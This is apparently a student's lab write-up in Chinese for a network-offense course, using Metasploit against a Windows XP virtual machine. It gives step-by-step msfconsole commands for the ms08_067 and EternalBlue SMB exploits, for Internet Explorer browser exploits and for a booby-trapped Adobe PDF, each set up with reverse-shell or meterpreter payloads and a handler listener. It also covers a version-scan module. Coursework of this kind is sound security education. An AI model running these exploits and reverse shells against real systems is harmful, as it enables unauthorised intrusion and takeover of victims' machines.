本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
一个主动攻击实践,如ms08_067。
一个针对浏览器的攻击,如ms11_050。
一个针对客户端的攻击,如Adobe。
成功应用任何一个辅助模块。
主动攻击:扫描主机漏洞。
攻击浏览器。
供给客户端。
渗透攻击模块Exploit
:
辅助模块Auxiliary
:
能够帮助渗透测试中在进行渗透攻击之前得到的目标系统丰富的情报信息,从而发起更具目标性的精准攻击。
主要包括针对各种网络服务的扫描和查点、构建虚假服务收集登录密码、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz测试发掘漏洞、实施网络协议欺骗等模块。
攻击载荷Payload
:
是在渗透成功后促使目标系统运行的一端植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。实际上,该模块就是计算机集成的针对不同操作系统实现shellcode攻击的ruby代码。
三种payload
:Single,Stager,Stages。
空字段模块Nop
:
编码模块Encoders
:
后渗透攻击模块Post
:
msfconsole
查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops]
查看设置信息show [options]
查看攻击目标类型show [target]
查找命令search
查找2018年产生的在windows平台下的漏洞search ms18(或CNE:2018) type:exploit platform:windows
armitage
启动服务器service postgresql start
启动armitagearmitage
webgui
exploit
,payload
,encode
exploit:既可以看成是运载恶意代码的载体,也可以理解成利用漏洞进行攻击的通道。类似于攻击的执行方。
payload:载荷是攻击的具体武器,每次都要进行设置。或者通俗来时就是用来攻击的“工具人”。
encode:用来编码,用于伪装。
实验开始前,要保证两台虚拟机(我的是Kali和WinXP)可以相互ping通,但在ping的过程中,发现出现以下的错误。
经过查阅资料,发现是WinXP虚拟机在之前做其他实验时,设置过IPSEC。 在"计算机管理"的"服务"中找到"IPSEC Services"服务项 默认是启动状态,将其停用即可。下面是ping通好的截图。
攻击机:kali 192.168.111.130
靶机:Windows XP 192.168.111.131
nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.111.131
探测靶机是否存在该漏洞msfconsole
。使用命令search ms08-067
查看漏洞的渗透模块。use exploit/windows/smb/ms08_067_netapi
进入该模块,并用show payloads
显示有效的攻击载荷。set payload generic/shell_reverse_tcp
设置攻击的载荷。show options
可以查看到进行攻击需要设置的参数,Required
的列表下标记为yes
的为必须设置的项。set LHOST 192.168.111.130
和set RHOST 192.168.111.131
。exploit
进行攻击。但出现了点问题。突然出现了让人闹心的是最后一句话“Exploit completed, but no session was created”,无法返回shell,我尝试了好多方法,更换靶机操作系统,更换metasploit版本,无论怎么折腾都不行,最后从书上找到答案,靶机要使用windows xp sp2英文版本的,重要事情要说三遍“英文版”、“英文版”、“英文版”。因为我使用的XP虚拟机是上学期李东东老师给的,参考同学的博客后,在exploit/windows/smb/ms08_067_netapi
模块中使用show targets
指令查看满足要求的靶机,我的靶机的版本是Windows XP SP3 Prefession
,在符合条件的中文版中并没有专业版的虚拟机。所以才会显示攻击成功但会话被拒绝。
在更换完虚拟机后,果然成功返回了shell。至于其他系统,尤其中文版的,我就不知道怎么搞了。
攻击机:kali 192.168.111.130
靶机:Windows XP 192.168.111.131
nmap -sS -A --script=smb-vuln-ms17-010 -PO 192.168.111.131
探测靶机是否存在该漏洞。search ms17-010
查看漏洞的渗透模块。use exploit/windows/smb/ms17_010_eternalblue
进入该模块并使用命令show payloads
显示有效的攻击载荷。set payload generic/shell_reverse_tcp
设置攻击的载荷。
设置攻击机IP和靶机IP:set LHOST 192.168.111.130
和set RHOST 192.168.111.131
。
exploit
进行永恒之蓝漏洞攻击。Triggering free of corrupted buffer
这句指令。猜测可能是这个漏洞已经进行了修复。攻击机:kali 192.168.111.130
靶机:Windows XP 192.168.111.131
search ms10-018
查看漏洞的渗透模块。use exploit/windows/browser/ms10_10_018_ie_behaviors
进入该模块,set payload windows/meterpreter/reverse_tcp
设置攻击的载荷。set LHOST 192.168.111.130 //设置攻击机IP
set RHOST 192.168.111.131 //设置靶机IP(可以不进行设置)
set LPORT 5213 //设置攻击机端口
set SRVHOST 192.168.111.130 //设置服务器IP
show options
exploit
生成了一个网址,我们将这个网址复制到靶机的浏览器中,然后可以在攻击机中观察到攻击成功的过程。后来我决定试试ms14-064,msf中使用use exploit/windows/browser/ms14_064_ole_code_execution
选择攻击模块。
设置好攻击机的IP与端口,使用的载荷等信息,然后开始攻击。在xp中打开生成的url,可以在kali中看到创建了一个链接,发现终于回连成功。
ctrl+c
退出当前状态,通过sessions -i 1
获取第一个会话。使用ipconfig
查看靶机地址。发现攻击的是xp主机,攻击终于成功。shell
即可获取靶机终端。攻击机:kali 192.168.111.130
靶机:Windows XP 192.168.111.131
search adobe
查询针对adobe的攻击模块。use exploit/windows/fileformat/adobe_cooltype_sing
进入该模块并show payloads
显示有效的攻击载荷。
set payload windows/meterpreter/reverse_tcp设置攻击的载荷。
set FILENAME 20175213lzh.pdf
set LHOST 192.168.111.130
set RHOST 192.168.111.131
set LPORT 5213
exploit
/root/.msf4/local
路径中,需要将文件拖拽到靶机中,由于root文件夹是权限文件夹,不能直接打开,所以我们预先通过命令行将文件复制到主目录下cp /root/.msf4/local/20175213lzh.pdf /home/kali
back
指令退出当前模块,进入监听模块。use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.111.130
set LPORT 5213
exploit
功能:使用smb_version模块对目标主机的系统版本进行探测
进入模块:use auxiliary/scanner/smb/smb_version
。
查看需要的参数:show options
。
填写参数。
执行:exploit
。
虽然这次实验总体不难,但是很繁琐,都是在重复重复相同的步骤。但好在这一次实验中碰到的问题都能得到有效及时的解决,没有占用太多时间,也有更多的时间其查阅,总结资料,也对msf的功能有了更深的理解。希望以后的实验能收获更多。
2019-2020-2 网络对抗技术 20175213吕正宏 Exp6 MFS基础应用
原文:https://www.cnblogs.com/LZHNB/p/12813547.html